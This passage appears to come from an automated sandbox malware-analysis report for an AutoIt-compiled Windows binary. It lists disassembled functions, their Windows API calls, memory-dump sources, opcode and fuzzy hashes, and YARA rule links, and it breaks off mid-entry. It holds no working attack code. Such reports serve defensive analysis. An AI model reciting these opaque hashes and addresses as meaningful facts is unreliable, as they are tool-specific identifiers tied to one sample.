                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: IconLoad
                • String ID: blank$info$question$stop$warning
                • API String ID: 2457776203-404129466
                • Opcode ID: c9450c6dee7ff8c4c115505b19bd219a6c137510019c4ebcd1653f36a0a4d042
                • Instruction ID: efd76f762221af0e6e0e59f07e032d4dff7644692d56aeebcc130d3e87f159f7
                • Opcode Fuzzy Hash: c9450c6dee7ff8c4c115505b19bd219a6c137510019c4ebcd1653f36a0a4d042
                • Instruction Fuzzy Hash: 1C110D3124C307BAEB216B959C82DDE77DC9F15728F60407EF90AA62C1DBB19F418165
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0E653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                • String ID: 0.0.0.0
                • API String ID: 642191829-3771769585
                • Opcode ID: 3644a6003e6259809d74e3514dfef87d7b6e6930e6aa8a04f66117ebf0989c17
                • Instruction ID: 547aa64da479868bc95b9cbc73434c75c983589a04e6e56b8034cf607350eaac
                • Opcode Fuzzy Hash: 3644a6003e6259809d74e3514dfef87d7b6e6930e6aa8a04f66117ebf0989c17
                • Instruction Fuzzy Hash: 3311E131900215ABDB247B34AC4AFEE77ACDF01720F1405B9F556A20E2EF709A81DA61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C242A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(?), ref: 00C242C8
                • CharUpperBuffW.USER32(?,?), ref: 00C243D7
                • _wcslen.LIBCMT ref: 00C243E7
                • VariantClear.OLEAUT32(?), ref: 00C2457C
                  • Part of subcall function 00C115B3: VariantInit.OLEAUT32(00000000), ref: 00C115F3
                  • Part of subcall function 00C115B3: VariantCopy.OLEAUT32(?,?), ref: 00C115FC
                  • Part of subcall function 00C115B3: VariantClear.OLEAUT32(?), ref: 00C11608
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                • API String ID: 4137639002-1221869570
                • Opcode ID: 79c0b972ff0b52e8c015d1faa7835532761f8f8bf2c3e68477b22d09c24cd5af
                • Instruction ID: 93ec9dab1ff25a2d2dca4dd99d62905e6c66be8398cd9654bf1737611bb8385e
                • Opcode Fuzzy Hash: 79c0b972ff0b52e8c015d1faa7835532761f8f8bf2c3e68477b22d09c24cd5af
                • Instruction Fuzzy Hash: D7916874A083119FC704EF28D48196AB7E5FF89314F14896DF89A9B351DB30EE46CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C387FD Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                Download Yara Rule
                APIs
                • IsWindow.USER32(00000000), ref: 00C38896
                • IsWindowEnabled.USER32(00000000), ref: 00C388A2
                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00C3897D
                • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00C389B0
                • IsDlgButtonChecked.USER32(?,00000000), ref: 00C389E8
                • GetWindowLongW.USER32(00000000,000000EC), ref: 00C38A0A
                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C38A22
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                • String ID:
                • API String ID: 4072528602-0
                • Opcode ID: 850c5cc450edf683064ae8821d21e376f954af56553085514ddd5b4f5f1ce7f7
                • Instruction ID: ce933c3ddcaffa184c587c8e0be65880dca2814d20faf6f912242d0260a4d7f0
                • Opcode Fuzzy Hash: 850c5cc450edf683064ae8821d21e376f954af56553085514ddd5b4f5f1ce7f7
                • Instruction Fuzzy Hash: 6C71DF34624304AFEF219F65C884FBE7BB9EF0A300F544459F966932A1CB31AE48DB11
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BC30B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                Download Yara Rule
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00BC30DB
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00BC30E3
                • _ValidateLocalCookies.LIBCMT ref: 00BC3171
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC319C
                • _ValidateLocalCookies.LIBCMT ref: 00BC31F1
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: b1edaa0bb12593b484ba453603d6bab3acd4861da3650dad0d6a3f8bc87ef7cc
                • Instruction ID: 0e4d89fdb0db20bad363834148dcea6a05e88565e76c7e6e4405086331a23382
                • Opcode Fuzzy Hash: b1edaa0bb12593b484ba453603d6bab3acd4861da3650dad0d6a3f8bc87ef7cc
                • Instruction Fuzzy Hash: 6B41A134E00208AFCB10DF68C885F9EBBF5EF45B64F58C199E815AB292D7319B45CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C080D1
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C080F7
                • SysAllocString.OLEAUT32(00000000), ref: 00C080FA
                • SysAllocString.OLEAUT32 ref: 00C0811B
                • SysFreeString.OLEAUT32 ref: 00C08124
                • StringFromGUID2.OLE32(?,?,00000028), ref: 00C0813E
                • SysAllocString.OLEAUT32(?), ref: 00C0814C
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                • String ID:
                • API String ID: 3761583154-0
                • Opcode ID: f43cbbf0c34a80d2617131868a29a0327cde90451df0b5cc73bdfe57328c2be0
                • Instruction ID: 1df2a88c4f9e1ee1c28e104b33f1670760d3327b970fa4e0ab11036d596066c0
                • Opcode Fuzzy Hash: f43cbbf0c34a80d2617131868a29a0327cde90451df0b5cc73bdfe57328c2be0
                • Instruction Fuzzy Hash: 5F218671210204AFDB10AFA8DC88EAE77ECEF49360704C125F955CB2E0DA70ED89CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0E223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C0E23D
                • LoadStringW.USER32(00000000), ref: 00C0E244
                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C0E25A
                • LoadStringW.USER32(00000000), ref: 00C0E261
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C0E2A5
                Strings
                • %s (%d) : ==> %s: %s %s, xrefs: 00C0E282
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: HandleLoadModuleString$Message
                • String ID: %s (%d) : ==> %s: %s %s
                • API String ID: 4072794657-3128320259
                • Opcode ID: 9874d65f8890c134b6e569d889d959e6c84e85a919fcb281f0cdbf3a9d5da9a3
                • Instruction ID: a28c58b7053536dc1158b5202cc462519efc2f94e355948e7cd61847c4f34255
                • Opcode Fuzzy Hash: 9874d65f8890c134b6e569d889d959e6c84e85a919fcb281f0cdbf3a9d5da9a3
                • Instruction Fuzzy Hash: 3D0112F69102187FE7119794AD89FEA776CD708300F014991B756E2051EA749E848B71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C11227 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                Download Yara Rule
                APIs
                • InterlockedExchange.KERNEL32(?,?), ref: 00C11237
                • EnterCriticalSection.KERNEL32(00000000,?), ref: 00C11249
                • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C11257
                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C11265
                • CloseHandle.KERNEL32(00000000), ref: 00C11274
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C11284
                • LeaveCriticalSection.KERNEL32(00000000), ref: 00C1128B
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                • String ID:
                • API String ID: 3495660284-0
                • Opcode ID: 51d653f946a48cb83b55126cb943f553f894c8b807f7d35407a552bc678fe214
                • Instruction ID: 617ce9b0c09a26521cea648904eca80e737105d424ca7e7addcd09d0a2ef40a7
                • Opcode Fuzzy Hash: 51d653f946a48cb83b55126cb943f553f894c8b807f7d35407a552bc678fe214
                • Instruction Fuzzy Hash: A7F03732056A12BBD7511B64FE8CBDABB39FF01302F442025F202918A0CB76E9B5DF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C225BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                Download Yara Rule
                APIs
                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C2271D
                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C2273E
                • WSAGetLastError.WSOCK32 ref: 00C2274F
                • htons.WSOCK32(?,?,?,?,?), ref: 00C22838
                • inet_ntoa.WSOCK32(?), ref: 00C227E9
                  • Part of subcall function 00C04277: _strlen.LIBCMT ref: 00C04281
                  • Part of subcall function 00C23B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C1F569), ref: 00C23B9D
                • _strlen.LIBCMT ref: 00C22892
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                • String ID:
                • API String ID: 3203458085-0
                • Opcode ID: 9ed0b381da736c6954ab965649f0db3d27f3fda358589b0e541b97e58c894853
                • Instruction ID: d5332ce7cdc6b4b2ae3248923cebe45a118e9b11f5c1c8a3aa0ad245f356eac2
                • Opcode Fuzzy Hash: 9ed0b381da736c6954ab965649f0db3d27f3fda358589b0e541b97e58c894853
                • Instruction Fuzzy Hash: FAB1E071204310AFD324DF24D895F2A7BE5AF85318F54858CF4A64B2E2DB31EE45CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD0547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                Download Yara Rule
                APIs
                • __allrem.LIBCMT ref: 00BD044A
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD0466
                • __allrem.LIBCMT ref: 00BD047D
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD049B
                • __allrem.LIBCMT ref: 00BD04B2
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD04D0
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                • String ID:
                • API String ID: 1992179935-0
                • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                • Instruction ID: e0c61c3e4831d8330e0a9d3c88865a532e99262e1c3bde42683cd0c9c97f7497
                • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                • Instruction Fuzzy Hash: 4E81A172A10B069BD724AE69D882B6AF7F9EF54324F2441ABE611D7381F7B0D9008B54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BC8669,00BC8669,?,?,?,00BD67DF,00000001,00000001,8BE85006), ref: 00BD65E8
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BD67DF,00000001,00000001,8BE85006,?,?,?), ref: 00BD666E
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD6768
                • __freea.LIBCMT ref: 00BD6775
                  • Part of subcall function 00BD3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC6A99,?,0000015D,?,?,?,?,00BC85D0,000000FF,00000000,?,?), ref: 00BD3BE2
                • __freea.LIBCMT ref: 00BD677E
                • __freea.LIBCMT ref: 00BD67A3
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 617cd6676ace44825e9fa019d643374e0203793bbaa99a5b2bd85b397435ec92
                • Instruction ID: c7e91bf13fc6b7ab0f308fedcd538faf40616d177dade8a6fd12b7486a7d3165
                • Opcode Fuzzy Hash: 617cd6676ace44825e9fa019d643374e0203793bbaa99a5b2bd85b397435ec92
                • Instruction Fuzzy Hash: EA51D17260021AABDB298F64CC81FAFB7EAEB44B54F1446AAFC15D6240FB34DC44C690
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C2C53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C2D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2C00D,?,?), ref: 00C2D314
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D350
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3C7
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3FD
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C629
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2C684
                • RegCloseKey.ADVAPI32(00000000), ref: 00C2C6C9
                • RegEnumValueW.ADVAPI32 ref: 00C2C6F8
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C2C752
                • RegCloseKey.ADVAPI32(?), ref: 00C2C75E
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                • String ID:
                • API String ID: 1120388591-0
                • Opcode ID: 810b4f61d741357248d51808394ddb5a688496b4e5b21b39c27fb9d2b0be9b2b
                • Instruction ID: 7b86240d7a9c7e39c66a5c944d73ef54d521b4698908dc757fa52c4c162dbf22
                • Opcode Fuzzy Hash: 810b4f61d741357248d51808394ddb5a688496b4e5b21b39c27fb9d2b0be9b2b
                • Instruction Fuzzy Hash: 91819D70208241AFD714DF24D885E2ABBE5FF85708F14859CF45A8B2A2DB31ED45CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(00000035), ref: 00C00049
                • SysAllocString.OLEAUT32(00000000), ref: 00C000F0
                • VariantCopy.OLEAUT32(00C002F4,00000000), ref: 00C00119
                • VariantClear.OLEAUT32(00C002F4), ref: 00C0013D
                • VariantCopy.OLEAUT32(00C002F4,00000000), ref: 00C00141
                • VariantClear.OLEAUT32(?), ref: 00C0014B
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Variant$ClearCopy$AllocInitString
                • String ID:
                • API String ID: 3859894641-0
                • Opcode ID: 5252530477b74dc1a9f31524cd20053de53e58b934e94c5230c0063ef5ab31fa
                • Instruction ID: f16d8fb46782f52642d7a550a248da044d6b52b68d5f139c6fe476b314f43949
                • Opcode Fuzzy Hash: 5252530477b74dc1a9f31524cd20053de53e58b934e94c5230c0063ef5ab31fa
                • Instruction Fuzzy Hash: B951E231654310EBCF24AB659895B2DB3E8EF06310F35804AF906DF2D6EB709C40CB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C110AB Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                Download Yara Rule
                APIs
                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C110C8
                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C11103
                • EnterCriticalSection.KERNEL32(?), ref: 00C1111F
                • LeaveCriticalSection.KERNEL32(?), ref: 00C11198
                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C111AF
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C111DD
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                • String ID:
                • API String ID: 3368777196-0
                • Opcode ID: 74fa88ed494ffcf7ac621055c8208c605c3f3119b26a07c87e47582517635031
